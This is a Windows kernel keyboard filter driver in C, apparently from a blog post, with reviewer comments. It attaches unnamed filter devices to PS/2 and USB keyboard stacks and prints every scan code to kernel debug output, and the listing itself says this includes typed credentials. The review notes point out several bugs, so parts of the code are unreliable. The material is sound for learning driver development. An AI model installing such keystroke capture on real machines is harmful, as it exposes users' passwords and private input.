/*
 * Keyboard class filter driver (WDM).
 *
 * DriverEntry routes every major function to a pass-through handler, then
 * AttachDevice puts an unnamed filter device on top of every
 * \Device\KeyboardClass<N> stack it can open (N = 0 .. DEVICE_NUM - 1).
 * Read IRPs are forwarded with a completion routine that prints the MakeCode
 * and Flags of each KEYBOARD_INPUT_DATA record through DbgPrint.
 *
 * Security relevance: while this driver is loaded, every scan code produced
 * on an attached keyboard (credentials included) is copied to the kernel
 * debug output by ReadCompleteCallBack. The filter devices are created
 * without a name, so the artifact visible on a live system is an extra device
 * object, owned by this driver object, at the top of each KeyboardClass
 * device stack.
 *
 * NOTE(review): several routines return STATUS_SEVERITY_ERROR. That constant
 * is the severity field value (0x3), not an NTSTATUS, and NT_SUCCESS() is
 * true for it. The dispatch routines that return it also leave the IRP
 * uncompleted on that path.
 */
#include <ntddk.h>
#include <ntddkbd.h>
#include <Ntstrsafe.h>

/* Forward declarations using the WDK role types so static analysis can check
 * each routine against its expected prototype. */
DRIVER_INITIALIZE DriverEntry;
DRIVER_UNLOAD UnloadDevice;
IO_COMPLETION_ROUTINE ReadCompleteCallBack;
DRIVER_DISPATCH DispatchGen;
__drv_dispatchType(IRP_MJ_POWER) DRIVER_DISPATCH DispatchPower;
__drv_dispatchType(IRP_MJ_PNP) DRIVER_DISPATCH DispatchPnP;
__drv_dispatchType(IRP_MJ_READ) DRIVER_DISPATCH DispatchRead;

/* Name prefix of the keyboard class devices; the index is appended at run time. */
#define KBD_DEVICE_NAME (L"\\Device\\KeyboardClass")
/* Number of device indices probed by AttachDevice (0 .. 15). */
#define DEVICE_NUM (16)

/* Per-filter-device state stored in DeviceObject->DeviceExtension. */
typedef struct _KEY_LOG_DEV_EXT
{
    /* Device returned by IoAttachDeviceToDeviceStack; all IRPs are forwarded to it. */
    PDEVICE_OBJECT pLowerDevObj;
} KEY_LOG_DEV_EXT, *P_KEY_LOG_DEV_EXT;

/* Not referenced by any routine in this listing. */
extern POBJECT_TYPE IoDriverObjectType;
/*
 * Number of read IRPs that were forwarded and whose completion routine has
 * not run yet: incremented in DispatchRead, decremented in
 * ReadCompleteCallBack, polled by UnloadDevice.
 * NOTE(review): declared ULONG and non-volatile, while the Interlocked*
 * routines take a `LONG volatile *`; the pointer types do not match.
 */
ULONG g_ulKeyCount = 0;

/*
 * Creates one filter device per reachable \Device\KeyboardClass<N> and
 * attaches it to the top of that device stack.
 *
 * In_pDriObj: driver object that will own the filter devices.
 * Returns 0 unconditionally; a name that cannot be opened or a failed
 * create/attach only skips that index.
 */
int AttachDevice(PDRIVER_OBJECT In_pDriObj)
{
    ULONG uli = 0;

    for (uli = 0; uli < DEVICE_NUM; uli ++)
    {
        PFILE_OBJECT pFileObj = NULL;
        PDEVICE_OBJECT pTargetDevObj = NULL;
        PDEVICE_OBJECT pFilterDevObj = NULL;
        PDEVICE_OBJECT pLowerDevObj = NULL;
        WCHAR aWCDevName[32] = {0};
        UNICODE_STRING unstrDevName = {0};

        /* Build "\Device\KeyboardClass<uli>" in the 32-WCHAR buffer. */
        if (!NT_SUCCESS(RtlStringCchPrintfW(aWCDevName, 32, L"%s%u", KBD_DEVICE_NAME, uli)))
        {
            goto tab_continue;
        }
        RtlInitUnicodeString(&unstrDevName, aWCDevName);

        /* Open the named device; on success both out-pointers are filled in. */
        if (!NT_SUCCESS(IoGetDeviceObjectPointer(&unstrDevName, FILE_ALL_ACCESS, &pFileObj, &pTargetDevObj)))
        {
            goto tab_continue;
        }

        /* Unnamed filter device (DeviceName == NULL) mirroring the target's type. */
        if (!NT_SUCCESS(IoCreateDevice(In_pDriObj, sizeof(KEY_LOG_DEV_EXT), NULL, pTargetDevObj->DeviceType, pTargetDevObj->Characteristics, FALSE, &pFilterDevObj)))
        {
            goto tab_continue;
        }

        pLowerDevObj = IoAttachDeviceToDeviceStack(pFilterDevObj, pTargetDevObj);
        if (pLowerDevObj == NULL)
        {
            /* Attach failed: discard the filter device created above. */
            IoDeleteDevice(pFilterDevObj);
            pFilterDevObj = NULL;
            goto tab_continue;
        }

        RtlZeroMemory(pFilterDevObj->DeviceExtension, sizeof(KEY_LOG_DEV_EXT));
        ((P_KEY_LOG_DEV_EXT)(pFilterDevObj->DeviceExtension))->pLowerDevObj = pLowerDevObj;

        /* Copy the lower device's attributes so the filter is transparent to
         * callers. The I/O-method flags matter because the completion routine
         * reads AssociatedIrp.SystemBuffer. */
        pFilterDevObj->DeviceType = pLowerDevObj->DeviceType;
        pFilterDevObj->Characteristics = pLowerDevObj->Characteristics;
        pFilterDevObj->StackSize = pLowerDevObj->StackSize + 1;
        pFilterDevObj->Flags |= pLowerDevObj->Flags & (DO_BUFFERED_IO | DO_DIRECT_IO | DO_POWER_PAGABLE);

    /* Reached on success as well as on every failure above. */
    tab_continue:
        /* NOTE(review): IoGetDeviceObjectPointer takes its reference on the
         * file object only; dereferencing the device object here as well looks
         * like one ObDereferenceObject too many - confirm against the WDK
         * documentation. */
        if (pTargetDevObj != NULL)
        {
            ObDereferenceObject(pTargetDevObj);
        }
        if (pFileObj != NULL)
        {
            ObDereferenceObject(pFileObj);
        }
    }

    return 0;
}

/*
 * DriverUnload routine: detaches and deletes every device owned by the
 * driver, then polls until no forwarded read IRP is still outstanding, so
 * ReadCompleteCallBack is not invoked after the routine returns.
 */
VOID UnloadDevice(PDRIVER_OBJECT In_pDriObj)
{
    LARGE_INTEGER liSleepTime = {0};
    PDEVICE_OBJECT pDevObj = NULL;
    PRKTHREAD CurrentThread;

    if (In_pDriObj == NULL)
    {
        return;
    }

    /* NOTE(review): KeDelayExecutionThread treats a positive interval as an
     * absolute system time and a negative one as relative (100 ns units).
     * This value is positive, so the wait below presumably returns at once
     * and the loop spins - confirm the intended delay. */
    liSleepTime = RtlConvertLongToLargeInteger(1000 * 1000 * 1000);
    CurrentThread = KeGetCurrentThread();
    KeSetPriorityThread(CurrentThread, LOW_REALTIME_PRIORITY);

    pDevObj = In_pDriObj->DeviceObject;
    while (pDevObj != NULL)
    {
        IoDetachDevice(((P_KEY_LOG_DEV_EXT)(pDevObj->DeviceExtension))->pLowerDevObj);
        IoDeleteDevice(pDevObj);
        /* NOTE(review): NextDevice is read from the device object after
         * IoDeleteDevice was called on it; the next pointer should be captured
         * before the delete. */
        pDevObj = pDevObj->NextDevice;
    }

    /* Wait for the completion routines of already-forwarded reads. A keyboard
     * read presumably stays pending until the next key event, so this can
     * block until a key is pressed. */
    while (g_ulKeyCount != 0)
    {
        KeDelayExecutionThread(KernelMode, FALSE, &liSleepTime);
    }
}

/*
 * Default dispatch routine: passes the IRP unchanged to the lower device.
 * Returns the status of IoCallDriver.
 */
NTSTATUS DispatchGen(PDEVICE_OBJECT In_pDevObj, PIRP In_pIRP)
{
    if (In_pDevObj == NULL || In_pIRP == NULL)
    {
        /* See the file-header note on STATUS_SEVERITY_ERROR. */
        return STATUS_SEVERITY_ERROR;
    }

    /* The filter adds nothing of its own, so the lower driver reuses this stack location. */
    IoSkipCurrentIrpStackLocation(In_pIRP);
    return IoCallDriver(((P_KEY_LOG_DEV_EXT)(In_pDevObj->DeviceExtension))->pLowerDevObj, In_pIRP);
}

/*
 * IRP_MJ_POWER dispatch: pass-through using the power-specific calls
 * (PoStartNextPowerIrp / PoCallDriver) instead of IoCallDriver.
 */
NTSTATUS DispatchPower(PDEVICE_OBJECT In_pDevObj, PIRP In_pIRP)
{
    if (In_pDevObj == NULL || In_pIRP == NULL)
    {
        return STATUS_SEVERITY_ERROR;
    }

    PoStartNextPowerIrp(In_pIRP);
    IoSkipCurrentIrpStackLocation(In_pIRP);
    return PoCallDriver(((P_KEY_LOG_DEV_EXT)(In_pDevObj->DeviceExtension))->pLowerDevObj, In_pIRP);
}

/*
 * IRP_MJ_PNP dispatch: forwards the request and, for IRP_MN_REMOVE_DEVICE,
 * detaches and deletes this filter device afterwards.
 * Returns the lower driver's status.
 */
NTSTATUS DispatchPnP(PDEVICE_OBJECT In_pDevObj, PIRP In_pIRP)
{
    NTSTATUS ntsRetVal = STATUS_SUCCESS;
    P_KEY_LOG_DEV_EXT pDevExt = NULL;
    PIO_STACK_LOCATION pIRPStack = NULL;

    if (In_pDevObj == NULL || In_pIRP == NULL)
    {
        ntsRetVal = STATUS_SEVERITY_ERROR;
        goto fun_ret;
    }

    pDevExt = (P_KEY_LOG_DEV_EXT)(In_pDevObj->DeviceExtension);
    pIRPStack = IoGetCurrentIrpStackLocation(In_pIRP);
    if (pDevExt == NULL || pIRPStack == NULL)
    {
        ntsRetVal = STATUS_SEVERITY_ERROR;
        goto fun_ret;
    }

    IoSkipCurrentIrpStackLocation(In_pIRP);
    ntsRetVal = IoCallDriver(pDevExt->pLowerDevObj, In_pIRP);
    /* NOTE(review): pIRPStack points into the IRP, which no longer belongs to
     * this driver once IoCallDriver has been called and may already have been
     * completed and freed. MinorFunction should be saved before forwarding. */
    if (pIRPStack->MinorFunction == IRP_MN_REMOVE_DEVICE)
    {
        IoDetachDevice(pDevExt->pLowerDevObj);
        IoDeleteDevice(In_pDevObj);
    }

fun_ret:
    return ntsRetVal;
}

/*
 * Completion routine for forwarded read IRPs. On a successful read it treats
 * the system buffer as an array of KEYBOARD_INPUT_DATA and prints MakeCode
 * and Flags for each record, then decrements the outstanding-read counter.
 *
 * In_pvContext is the filter device object passed by DispatchRead.
 * Returns the IRP's own completion status.
 */
NTSTATUS ReadCompleteCallBack(PDEVICE_OBJECT In_pDevObj, PIRP In_pIRP, PVOID In_pvContext)
{
    /* Set until the first successful read with at least one record is seen.
     * Shared by all filter devices and updated without synchronization. */
    static unsigned char s_ucFirstFlag = 1;

    if (In_pDevObj == NULL || In_pIRP == NULL || In_pvContext == NULL)
    {
        /* NOTE(review): this path returns without decrementing g_ulKeyCount,
         * which UnloadDevice waits on. */
        return STATUS_SEVERITY_ERROR;
    }

    if (NT_SUCCESS(In_pIRP->IoStatus.Status))
    {
        size_t i = 0;
        /* IoStatus.Information is the byte count returned; convert to a record count. */
        size_t szSize = In_pIRP->IoStatus.Information / sizeof(KEYBOARD_INPUT_DATA);
        /* Assumes the stack uses buffered I/O so SystemBuffer holds the data - TODO confirm. */
        PKEYBOARD_INPUT_DATA pKeyData = (PKEYBOARD_INPUT_DATA)(In_pIRP->AssociatedIrp.SystemBuffer);
        if (s_ucFirstFlag == 1 && szSize >= 1)
        {
            s_ucFirstFlag = 0;
            /* If the very first record has the low flag bit set (KEY_BREAK in
             * ntddkbd.h), print the same key once with that bit cleared, i.e.
             * the press whose release is the first event seen. */
            if (pKeyData[0].Flags % 2 == 1)
            {
                DbgPrint("%u\t%u\n", pKeyData[0].MakeCode, pKeyData[0].Flags - 1);
                DbgPrint("==================================\n");
            }
        }
        /* Every scan code goes to the kernel debug output in clear text. */
        for (i = 0; i < szSize; i ++)
        {
            DbgPrint("%u\t%u\n", pKeyData[i].MakeCode, pKeyData[i].Flags);
        }
        DbgPrint("==================================\n");
    }

    InterlockedDecrement(&g_ulKeyCount);

    /* Propagate the pending state to this driver's stack location. */
    if(In_pIRP->PendingReturned)
    {
        IoMarkIrpPending(In_pIRP);
    }
    return In_pIRP->IoStatus.Status;
}

/*
 * IRP_MJ_READ dispatch: forwards the read to the lower device with
 * ReadCompleteCallBack registered for success, error and cancel.
 * Returns the status of IoCallDriver, or STATUS_INVALID_DEVICE_REQUEST when
 * the IRP has no stack location left for the lower driver.
 */
NTSTATUS DispatchRead(PDEVICE_OBJECT In_pDevObj, PIRP In_pIRP)
{
    if (In_pDevObj == NULL || In_pIRP == NULL)
    {
        return STATUS_SEVERITY_ERROR;
    }

    /* CurrentLocation == 1: this is the last stack location, nothing left to
     * hand to the lower driver, so fail the request here. */
    if (In_pIRP->CurrentLocation == 1)
    {
        In_pIRP->IoStatus.Status = STATUS_INVALID_DEVICE_REQUEST;
        In_pIRP->IoStatus.Information = 0;
        IoCompleteRequest(In_pIRP, IO_NO_INCREMENT);
        return STATUS_INVALID_DEVICE_REQUEST;
    }

    /* Count the read as outstanding before it leaves this driver. */
    InterlockedIncrement(&g_ulKeyCount);

    /* A completion routine needs its own stack location, so copy instead of skip. */
    IoCopyCurrentIrpStackLocationToNext(In_pIRP);
    IoSetCompletionRoutine(In_pIRP, ReadCompleteCallBack, In_pDevObj, TRUE, TRUE, TRUE);
    return IoCallDriver(((P_KEY_LOG_DEV_EXT)(In_pDevObj->DeviceExtension))->pLowerDevObj, In_pIRP);
}

/*
 * Driver entry point: installs the dispatch table and unload routine, then
 * attaches to the keyboard class devices.
 */
NTSTATUS DriverEntry(PDRIVER_OBJECT In_pDriObj, PUNICODE_STRING In_punstrRegPath)
{
    ULONG uli = 0;

    if (In_pDriObj == NULL || In_punstrRegPath == NULL)
    {
        return STATUS_SEVERITY_ERROR;
    }

    /* Pass-through for every major function, then override the three handled specially. */
    for (uli = 0; uli <= IRP_MJ_MAXIMUM_FUNCTION; uli ++)
    {
        In_pDriObj->MajorFunction[uli] = DispatchGen;
    }
    In_pDriObj->MajorFunction[IRP_MJ_READ] = DispatchRead;
    In_pDriObj->MajorFunction[IRP_MJ_POWER] = DispatchPower;
    In_pDriObj->MajorFunction[IRP_MJ_PNP] = DispatchPnP;
    In_pDriObj->DriverUnload = UnloadDevice;

    /* AttachDevice always returns 0 in this listing, so this branch is not
     * taken; the driver loads even when no keyboard device was attached. */
    if (AttachDevice(In_pDriObj) != 0)
    {
        return STATUS_SEVERITY_ERROR;
    }
    return STATUS_SUCCESS;
}
// Support for USB keyboards.
// NOTE(review): this fragment writes pDevExt->ulDevType and uses DEVICE_TYPE_FLT,
// neither of which is declared in the first listing on this page; it presumably
// belongs to a later revision of the driver.
// Driver object whose device list is enumerated.
#define USB_DIRVER_NAME (L"\\Driver\\HidUsb")
// Despite the macro name this is a driver name; it is compared against the
// DriverName of each device attached above a HidUsb device.
#define USBKDB_DEVICE_NAME (L"\\Driver\\kbdhid")

// Declared here as a pointer to POBJECT_TYPE and dereferenced at the call site below.
extern "C" extern POBJECT_TYPE *IoDriverObjectType;
// Manual prototype, presumably because the included public headers do not declare this routine.
extern "C"
NTKERNELAPI
NTSTATUS
ObReferenceObjectByName(
    IN PUNICODE_STRING ObjectName,
    IN ULONG Attributes,
    IN PACCESS_STATE PassedAccessState,
    IN ACCESS_MASK DesiredAccess,
    IN POBJECT_TYPE ObjectType,
    IN KPROCESSOR_MODE AccessMode,
    IN OUT PVOID ParseContext,
    OUT PVOID * Object
    );

// Attaches a filter device to every HidUsb device stack that has a device
// owned by \Driver\kbdhid attached above it.
//
// In_pDriObj: driver object that will own the filter devices.
// Returns iRetVal, which is never changed from 0 in this routine.
int AttachUsbDevice(PDRIVER_OBJECT In_pDriObj)
{
    int iRetVal = 0;
    PDRIVER_OBJECT pUsbDriverObj = NULL;
    UNICODE_STRING unstrUsbDriverName = {0};
    NTSTATUS nsRefObjRetVal = STATUS_SUCCESS;
    PDEVICE_OBJECT pTargetDevObj = NULL;

    RtlInitUnicodeString(&unstrUsbDriverName, USB_DIRVER_NAME);
    // If this call fails for you on Win7, check the fifth argument and the
    // declaration above. Unreliable XP, unreliable domestic books, unreliable
    // code found online.
    nsRefObjRetVal = ObReferenceObjectByName(&unstrUsbDriverName, OBJ_CASE_INSENSITIVE, NULL, 0, *IoDriverObjectType, KernelMode, NULL, (PVOID *)&pUsbDriverObj);
    if (!NT_SUCCESS(nsRefObjRetVal) || pUsbDriverObj == NULL)
        goto fun_ret;

    // NOTE(review): the device list and the AttachedDevice chains below belong
    // to other drivers and are walked without any visible lock or per-device
    // reference; a device removed concurrently would leave a stale pointer.
    pTargetDevObj = pUsbDriverObj->DeviceObject;
    while (pTargetDevObj)
    {
        BOOLEAN BFound = FALSE;
        PDEVICE_OBJECT pAttDevObj = pTargetDevObj->AttachedDevice;
        // Nothing attached above this device: skip it.
        if (pAttDevObj == NULL)
        {
            pTargetDevObj = pTargetDevObj->NextDevice;
            continue;
        }

        // Walk upwards through the stack looking for a device owned by kbdhid.
        while (pAttDevObj)
        {
            // NOTE(review): MmIsAddressValid only tests the page at that address
            // at that moment, and a UNICODE_STRING buffer is not guaranteed to
            // be NUL-terminated although _wcsicmp reads up to a NUL. A
            // length-bounded comparison of the two UNICODE_STRINGs avoids both
            // assumptions.
            if (MmIsAddressValid(pAttDevObj->DriverObject->DriverName.Buffer)
                && pAttDevObj->DriverObject->DriverName.Length == wcslen(USBKDB_DEVICE_NAME) * sizeof(WCHAR))
            {
                if (_wcsicmp(pAttDevObj->DriverObject->DriverName.Buffer, USBKDB_DEVICE_NAME) == 0)
                {
                    BFound = TRUE;
                    break;
                }
            }
            pAttDevObj = pAttDevObj->AttachedDevice;
        }

        if (BFound != FALSE)
        {
            PDEVICE_OBJECT pLowerDevObj = NULL;
            PDEVICE_OBJECT pFilterDevObj = NULL;
            P_KEY_LOG_DEV_EXT pDevExt = NULL;

            // Unnamed filter device (DeviceName == NULL) mirroring the target's type.
            if (NT_SUCCESS(IoCreateDevice(In_pDriObj, sizeof(KEY_LOG_DEV_EXT), NULL, pTargetDevObj->DeviceType, pTargetDevObj->Characteristics, FALSE, &pFilterDevObj)))
            {
                // IoAttachDeviceToDeviceStack attaches to the top of the stack
                // containing pTargetDevObj and returns the device that was on top.
                pLowerDevObj = IoAttachDeviceToDeviceStack(pFilterDevObj, pTargetDevObj);
                if (pLowerDevObj != NULL)
                {
                    pDevExt = (P_KEY_LOG_DEV_EXT)pFilterDevObj->DeviceExtension;
                    RtlZeroMemory(pDevExt, sizeof(KEY_LOG_DEV_EXT));
                    pDevExt->pLowerDevObj = pLowerDevObj;
                    pDevExt->ulDevType = DEVICE_TYPE_FLT;

                    // Copy the lower device's attributes so the filter is transparent to callers.
                    pFilterDevObj->DeviceType = pLowerDevObj->DeviceType;
                    pFilterDevObj->Characteristics = pLowerDevObj->Characteristics;
                    pFilterDevObj->StackSize = pLowerDevObj->StackSize + 1;
                    pFilterDevObj->Flags |= pLowerDevObj->Flags & (DO_BUFFERED_IO | DO_DIRECT_IO | DO_POWER_PAGABLE);
                }
                else
                    // Attach failed: discard the filter device created above.
                    IoDeleteDevice(pFilterDevObj);
            }
        }

        pTargetDevObj = pTargetDevObj->NextDevice;
    }

fun_ret:
    // Release the reference taken by ObReferenceObjectByName.
    if (NT_SUCCESS(nsRefObjRetVal) && pUsbDriverObj != NULL)
    {
        ObDereferenceObject(pUsbDriverObj);
    }
    return iRetVal;
}
本文首发于博客园,任何其他站点均为爬虫或转载,爬虫最无耻。